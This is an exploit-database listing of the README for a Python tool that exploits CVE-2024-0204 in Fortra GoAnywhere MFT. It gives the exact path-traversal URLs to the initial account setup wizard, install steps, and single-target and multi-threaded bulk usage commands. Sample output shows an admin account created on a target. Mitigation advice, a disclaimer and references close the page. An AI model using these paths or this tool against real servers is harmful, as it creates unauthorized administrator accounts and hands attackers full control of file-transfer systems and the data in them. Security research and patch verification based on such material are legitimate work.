Exploit for Forced Browsing in Fortra Goanywhere Managed File Transfer CVE-2024-0204

Name: Exploit for Forced Browsing in Fortra Goanywhere Managed File Transfer CVE-2024-0204
Rating: 5 (136 reviews)
2025-05-25 | CVSS 9.8
## https://sploitus.com/exploit?id=4F608487-4D8C-5610-8067-B64B3DB7C0A7
# CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Exploit

## Description

This exploit demonstrates a critical authentication bypass vulnerability in Fortra GoAnywhere MFT versions prior to 7.4.1. The vulnerability allows an unauthenticated attacker to create an administrator account by exploiting a path traversal vulnerability to access the initial account setup wizard.

CVE-2024-0204 was discovered in January 2024 and affects all GoAnywhere MFT versions prior to 7.4.1. This vulnerability has been rated as Critical (CVSS 9.8) due to its ease of exploitation and the complete administrative access it provides to vulnerable instances.

## Technical Details

The vulnerability exists due to improper access control on the initial account setup wizard. By using path traversal techniques, an attacker can access the setup wizard and create an administrator account without any authentication. The exploit implements two different path traversal methods to maximize success across various server configurations:

1. Primary method: `/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml`
2. Secondary method: `/goanywhere/..;/wizard/InitialAccountSetup.xhtml`

If the first method fails, the exploit automatically tries the second method. This dual approach increases the likelihood of successful exploitation, as different server configurations may handle path traversal differently.

## Features

- Multiple path traversal techniques to increase success rate
- Multi-target scanning support
- Colored and user-friendly output
- Multi-threading for faster scanning
- Comprehensive result summary

## Installation

```bash
# Clone the repository
git clone https://github.com/ibrahimsql/CVE-2024-0204.git
cd CVE-2024-0204

# Install dependencies
pip install -r requirements.txt
```

## Usage

### Single Target Scanning

```bash
python CVE-2024-0204.py -t example.com -u admin -p password123
```

### Multi-Target Scanning from File

```bash
python CVE-2024-0204.py -f targets.txt -u admin -p password123 --threads 20
```

### Command Line Arguments

```
-t, --target       Target host to check (e.g., 'example.com' or '192.168.1.1')
-f, --file         File containing targets, one per line
-u, --username     Username for the admin account to create
-p, --password     Password for the admin account to create
--timeout          Connection timeout in seconds (default: 10)
--threads          Number of concurrent threads for scanning (default: 10)
```

## Example Output

```
[*] Checking single target: vulnerable.example.com
[+] vulnerable.example.com - Potentially vulnerable via /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml!
[+] vulnerable.example.com - Admin account created successfully via /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml! Username: admin, Password: password123

[*] Scan Summary:
[+] Vulnerable targets: 1
[-] Non-vulnerable targets: 0
[!] Error targets: 0

[+] Vulnerable targets:
  - vulnerable.example.com
```

## Mitigation

To mitigate this vulnerability, system administrators should:

1. Upgrade to GoAnywhere MFT version 7.4.1 or higher
2. Apply the workaround provided by Fortra by deleting or emptying the InitialAccountSetup.xhtml file
3. Restrict access to the administrative interfaces at the network level

## Warning

This tool is intended for ethical hacking, penetration testing, and security research purposes only. Using this tool to access unauthorized systems may be illegal. Always work with written permission from the target system's owner. The author is not responsible for any misuse of this tool.

## License

This project is licensed under the MIT License - see the LICENSE file for details.

## Author

**@ibrahimsql** - [GitHub](https://github.com/ibrahimsql)

## References

1. [Rapid7 Blog: CVE-2024-0204](https://old.rapid7.com/blog/post/2024/01/23/etr-cve-2024-0204-critical-authentication-bypass-in-fortra-goanywhere-mft/)
2. [Tenable Blog: CVE-2024-0204](https://www.tenable.com/blog/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-vulnerability)
3. [Kroll Security Advisory](https://www.kroll.com/en/insights/publications/cyber/authentication-bypass-in-fortra-goanywhere-mft)
4. [Fortra Security Advisory](https://www.fortra.com/security/advisory/fi-2024-001)
5. [NVD - CVE-2024-0204](https://nvd.nist.gov/vuln/detail/cve-2024-0204)